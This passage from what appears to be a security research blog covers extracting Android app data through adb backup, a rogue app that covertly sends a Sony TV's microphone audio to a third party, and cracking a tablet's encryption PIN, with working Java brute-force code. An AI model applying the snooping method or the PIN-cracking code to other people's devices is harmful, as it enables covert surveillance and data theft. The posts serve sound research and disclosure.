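                .add("api.example.com", "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")
                .build();
        return new OkHttpClient.Builder()
                .certificatePinner(pinner)
                .build();
    }
}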

Those 3 key issues will massively reduce the risk of an attacker exploiting this or any app.

 

How-to subvert Android backups to export sandboxed app files


appback

During Android security reviews one of the most annoying and troublesome things I come across is getting the data onto my assessment machine for thorough analysis. It’s the copying of sandboxed application files that’s a real bugbear.

In an effort to reduce my pain I use the following method.

App sandboxing 101

As a little refresher, every installed application on Android is given a directory in which to store its internal files. This directory is restricted by file permissions so it is only accessible by the application and the root user. This is known as the application’s sandbox.

The sandbox is stored under /data/data/appname, where "appname" is the fully qualified package name the app is built with.

Here’s an example from a device running Marshmallow:

root@hammerhead:/data/data # cd ptp.unacceptablebehaviour
root@hammerhead:/data/data/ptp.unacceptablebehaviour # ls -l
drwxrwx--x u0_a105  u0_a105           2016-03-22 11:37 app_webview
drwxrwx--x u0_a105  u0_a105           2016-03-22 12:11 cache
drwxrwx--x u0_a105  u0_a105           2016-03-22 12:11 code_cache
drwxrwx--x u0_a105  u0_a105           2016-03-22 12:11 shared_prefs

In Android every app is given a unique user (in this case u0_a105) and group. With Unix file permissions the only users that can access the sandbox are:

  • root
  • u0_a105
  • Members of the u0_a105 group

So, how can I get the files I want back to my assessment laptop for analysis if I’m not any of the above? This is where backup comes in.

The allowBackup parameter

An app controls backups through the android:allowBackup attribute of the <application> tag in AndroidManifest.xml. The default setting allows backups.
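
For reference, the attribute lives on the <application> element; setting it to "false" opts the app out of adb backups:

<application
    android:allowBackup="false"
    ... >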

Backups are useful because you don't need to be root to make one. This means that you can extract cleartext secrets directly from an app's sandbox without rooting your device; all you need is adb and access to the device.

To make a backup, you can use the adb backup command (the -d is just to specify the physical device):

C:\Users\dave\Desktop>adb -d backup ptp.unacceptablebehaviour

Now unlock your device and confirm for the backup to go ahead:

appback1

By default it will save a file called backup.ab in the directory adb was run from. The format is a slightly modified tar file with a 24 byte header:

ANDROID BACKUP
3
1
none

Here line 1 is the magic string (i.e. it identifies the file type), line 2 is the version number, line 3 is a compression flag (1 is compressed) and line 4 is the encryption algorithm ("none" here). When the backup is encrypted there are extra fields, but we don't need those.

Extracting that data

After these fields is the data in .tar format. If the file is compressed we need to decompress it. I do this through python as I’m lazy (I really need to script this). This is all for a compressed and unencrypted file:

>>> import zlib
>>> with open("backup.ab", "rb") as f:
...     data = f.read()
...
>>> zipped = data[24:]
>>> raw = zlib.decompress(zipped)
>>> with open("backup.tar", "wb") as o:
...     o.write(raw)
...
>>> exit()

This should remove the header and write it decompressed to backup.tar which you can then open up in your favourite tar file reader, such as 7-zip:

appback2

If you don’t fancy rolling your own reader in python then you can use the android-backup-extractor (https://github.com/nelenkov/android-backup-extractor) utility to do this for you:

c:\users\dave\desktop> java -jar abe.jar unpack backup.ab backup.tar

Snooping Sony Bravia TV


androidsony
You’ll no doubt have seen the snooping Samsung TV we investigated last year.

…and the snooping Android mobile app we wrote for the BBC a couple of months back.

Since then we’ve been trying to combine the two attacks and get an Android-based TV to snoop on your audio.

Today we succeeded in getting our rogue Android app to work on a Sony Bravia telly.

How-to

First, enable ‘install apps from unknown sources’.

That’s in Android settings, personal, security & restrictions.

Grab ES File Explorer and install from a USB key.

Then install your rogue app.

OR – just put your rogue app in the Play store. Far easier!

The video shows the TV listening to the microphone input, sending the audio to a cloud speech-to-text service, converting it to text, then delivering it to an external laptop.

The laptop could be anywhere with an internet connection. We’ve just put it next to the telly so that we can get it all in one simple video.

You could use a mobile phone or tablet to receive the data instead.

Issues

The TV doesn’t have a microphone built in, so we had to plug in a USB mike.

Ours is a Bravia 55X8005C; no doubt the higher-end models come with microphones built in.

It runs quite an old version of Lollipop (5.0.2).

Consequences

Convince your victim to install a rogue app from the Play store or install it on their TV when they’re not looking.

Then everything said in earshot of the TV can be sent to a 3rd party.

I guess the most practical use of this is to snoop on people that you know. What an unpleasant thought!

Argos MyTablet FUBAR


pinktab

Some time ago, we noticed that Argos was selling a cheap tablet – the Bush MyTablet. It didn’t get great reviews, but our attention was drawn to it because

1. It was clearly running Android
2. It used the RK3188 CPU
3. It was Pink

 

 

A quick poke around the Android settings showed it was running KitKat 4.4.4. This was a long time ago, but even then Lollipop was current. Fail.

bushsettings

It supported encryption, unlike the Tesco Hudl 1, but we found we could crack a 4 digit PIN in under an hour… on a laptop, let alone a cracking rig!

Extracting the data

The key was getting into the vulnerable Rockchip flash mode. Not as easy as on the Hudl.

First, we took the back off and removed the EM shield from the CPU, which also acted as a heatsink. The CPU quickly overheated and hard rebooted, dropping us into the bootloader and flash mode.

We could also cheat and enable ADB locally, but that of course required the PIN first.

Finally, after about an hour of fiddling, we discovered that one simply holds volume up and volume down while powering on. Flash mode fun!

bush1

Crack the PIN

Extract the encrypted key and the salt from the metadata partition and the userdata partition header, then brute-force the PIN:

bush3
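
For the curious, the shape of the brute force is sketched below. It assumes the classic pre-Lollipop FDE scheme (PBKDF2-HMAC-SHA1 over the PIN with the stored salt, 2000 iterations, yielding an AES key and IV that unwrap the master key); it is illustrative, not the exact tooling we used:

import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;
import java.util.Arrays;

public class FdePinBrute {
    public static String crack(byte[] salt, byte[] encMasterKey,
                               KeyTester tester) throws Exception {
        SecretKeyFactory kdf = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
        for (int pin = 0; pin <= 9999; pin++) {
            String candidate = String.format("%04d", pin);
            // 2000 iterations, 32 bytes out: 16-byte AES key + 16-byte IV.
            PBEKeySpec spec = new PBEKeySpec(candidate.toCharArray(), salt, 2000, 256);
            byte[] kekIv = kdf.generateSecret(spec).getEncoded();
            SecretKeySpec kek = new SecretKeySpec(Arrays.copyOfRange(kekIv, 0, 16), "AES");
            IvParameterSpec iv = new IvParameterSpec(Arrays.copyOfRange(kekIv, 16, 32));
            Cipher aes = Cipher.getInstance("AES/CBC/NoPadding");
            aes.init(Cipher.DECRYPT_MODE, kek, iv);
            byte[] masterKey = aes.doFinal(encMasterKey);
            if (tester.decryptsUserdata(masterKey)) { // known-plaintext check
                return candidate;
            }
        }
        return null;
    }

    // Supplied by the caller: decrypt a userdata sector with the candidate
    // master key and look for recognisable plaintext (e.g. the ext4 magic).
    public interface KeyTester {
        boolean decryptsUserdata(byte[] masterKey);
    }
}

At 10,000 candidates and one PBKDF2 run each, it's obvious why a 4-digit PIN falls in minutes on a laptop.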

Pwned!

We disclosed this to Home Retail Group in December 2014. At their request we waited some considerable time in order to avoid jeopardising a key sales period for them.

We didn’t get that much joy during the disclosure process, then frankly got bored of cheap Android tablets and moved on to IoT.

Rummaging through a box of old tablets today, we found the shiny pink Bush, so thought we may as well publish.

The Bush isn’t sold any more, though you can likely find them on eBay for giggles.

 
